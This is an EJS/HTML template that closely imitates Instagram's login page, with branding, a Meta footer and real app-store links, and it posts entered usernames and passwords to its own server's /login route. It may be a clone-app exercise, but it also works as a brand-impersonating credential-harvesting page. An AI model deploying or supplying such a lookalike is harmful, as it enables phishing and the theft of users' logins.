<html>
  <head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <script src="https://cdn.tailwindcss.com?plugins=forms,typography"></script>
		<script src="https://unpkg.com/unlazy@0.11.3/dist/unlazy.with-hashing.iife.js" defer init></script>
		<script type="text/javascript">
			window.tailwind.config = {
				darkMode: ['class'],
				theme: {
					extend: {
						colors: {
							border: 'hsl(var(--border))',
							input: 'hsl(var(--input))',
							ring: 'hsl(var(--ring))',
							background: 'hsl(var(--background))',
							foreground: 'hsl(var(--foreground))',
							primary: {
								DEFAULT: 'hsl(var(--primary))',
								foreground: 'hsl(var(--primary-foreground))'
							},
							secondary: {
								DEFAULT: 'hsl(var(--secondary))',
								foreground: 'hsl(var(--secondary-foreground))'
							},
							destructive: {
								DEFAULT: 'hsl(var(--destructive))',
								foreground: 'hsl(var(--destructive-foreground))'
							},
							muted: {
								DEFAULT: 'hsl(var(--muted))',
								foreground: 'hsl(var(--muted-foreground))'
							},
							accent: {
								DEFAULT: 'hsl(var(--accent))',
								foreground: 'hsl(var(--accent-foreground))'
							},
							popover: {
								DEFAULT: 'hsl(var(--popover))',
								foreground: 'hsl(var(--popover-foreground))'
							},
							card: {
								DEFAULT: 'hsl(var(--card))',
								foreground: 'hsl(var(--card-foreground))'
							},
						},
					}
				}
			}
		</script>
		<style type="text/tailwindcss">
			@layer base {
				:root {
					--background: 0 0% 100%;
--foreground: 240 10% 3.9%;
--card: 0 0% 100%;
--card-foreground: 240 10% 3.9%;
--popover: 0 0% 100%;
--popover-foreground: 240 10% 3.9%;
--primary: 240 5.9% 10%;
--primary-foreground: 0 0% 98%;
--secondary: 240 4.8% 95.9%;
--secondary-foreground: 240 5.9% 10%;
--muted: 240 4.8% 95.9%;
--muted-foreground: 240 3.8% 46.1%;
--accent: 240 4.8% 95.9%;
--accent-foreground: 240 5.9% 10%;
--destructive: 0 84.2% 60.2%;
--destructive-foreground: 0 0% 98%;
--border: 240 5.9% 90%;
--input: 240 5.9% 90%;
--ring: 240 5.9% 10%;
--radius: 0.5rem;
				}
				.dark {
					--background: 240 10% 3.9%;
--foreground: 0 0% 98%;
--card: 240 10% 3.9%;
--card-foreground: 0 0% 98%;
--popover: 240 10% 3.9%;
--popover-foreground: 0 0% 98%;
--primary: 0 0% 98%;
--primary-foreground: 240 5.9% 10%;
--secondary: 240 3.7% 15.9%;
--secondary-foreground: 0 0% 98%;
--muted: 240 3.7% 15.9%;
--muted-foreground: 240 5% 64.9%;
--accent: 240 3.7% 15.9%;
--accent-foreground: 0 0% 98%;
--destructive: 0 62.8% 30.6%;
--destructive-foreground: 0 0% 98%;
--border: 240 3.7% 15.9%;
--input: 240 3.7% 15.9%;
--ring: 240 4.9% 83.9%;
				}
			}
		</style>
  </head>
  <body>
    <div class="min-h-screen flex flex-col items-center justify-center bg-zinc-100">
  <div class="bg-white p-8 rounded-lg shadow-md w-full max-w-sm">
    <h1 class="text-center text-3xl font-bold mb-4" style="font-family: 'Lucida Grande';">Instagram</h1>
	<% if((error.length) > 0){ %>
        <p style="color: red; font-weight: 700; text-align: center;" class=" mb-2 justify-center items-center"><%= error%></p>
      <% } %>
    <form class="space-y-4" action="/login" method="post">
      <input type="text" placeholder="Enter Your Username" class="w-full p-2 border border-zinc-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary" name="username" />
      <input type="password" placeholder="Password" class="w-full p-2 border border-zinc-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary" name="password" />
      <button type="submit" class="w-full bg-blue-600 text-primary-foreground py-2 rounded-md hover:bg-blue-400">Log In</button>
    </form>
    <div class="flex items-center my-4">
      <div class="flex-grow border-t border-zinc-300"></div>
      <span class="mx-4 text-zinc-500">OR</span>
      <div class="flex-grow border-t border-zinc-300"></div>
    </div>
    <button class="w-full bg-blue-600 text-white py-2 rounded-md flex items-center justify-center hover:bg-blue-500">
      <img aria-hidden="true" alt="facebook-icon" src="/images/facebookmainlogo3.png" class="mr-2"> Log in with Facebook
    </button>
    <a href="/forgot-password" class="block text-center text-blue-500 mt-4">Forgot password?</a>
  </div>
  <div class="bg-white p-4 rounded-lg shadow-md mt-4 w-full max-w-sm text-center">
    <p>Don't have an account? <a href="/" class="text-blue-500">Sign up</a></p>
  </div>
  <div class="flex space-x-4 mt-4">
    <a href="https://play.google.com/store/search?q=instagram&c=apps"><img aria-hidden="true" alt="Google Play Store" src="/images/googleplaylogo.png" class="h-10 bg-white "></a>
    <a href="https://apps.microsoft.com/detail/9nblggh5l9xt?hl=en-in&gl=IN"><img aria-hidden="true" alt="Microsoft Store" src="/images/microsoftstorelogo.png" class="h-10"></a>
  </div>
  <div class="mt-8 text-zinc-500 text-sm text-center space-x-2">
    <a href="#" class="hover:underline">Meta</a>
    <a href="#" class="hover:underline">About</a>
    <a href="#" class="hover:underline">Blog</a>
    <a href="#" class="hover:underline">Jobs</a>
    <a href="#" class="hover:underline">Help</a>
    <a href="#" class="hover:underline">API</a>
    <a href="#" class="hover:underline">Privacy</a>
    <a href="#" class="hover:underline">Terms</a>
    <a href="#" class="hover:underline">Top Accounts</a>
    <a href="#" class="hover:underline">Hashtags</a>
    <a href="#" class="hover:underline">Locations</a>
    <a href="#" class="hover:underline">Instagram Lite</a>
    <a href="#" class="hover:underline">Contact Uploading & Non-Users</a>
    <a href="#" class="hover:underline">Meta Verified</a>
  </div>
  <div class="mt-4 text-zinc-500 text-sm text-center">
    <p>English (US) © 2023 Instagram from Meta</p>
  </div>
</div>
  </body>
</html>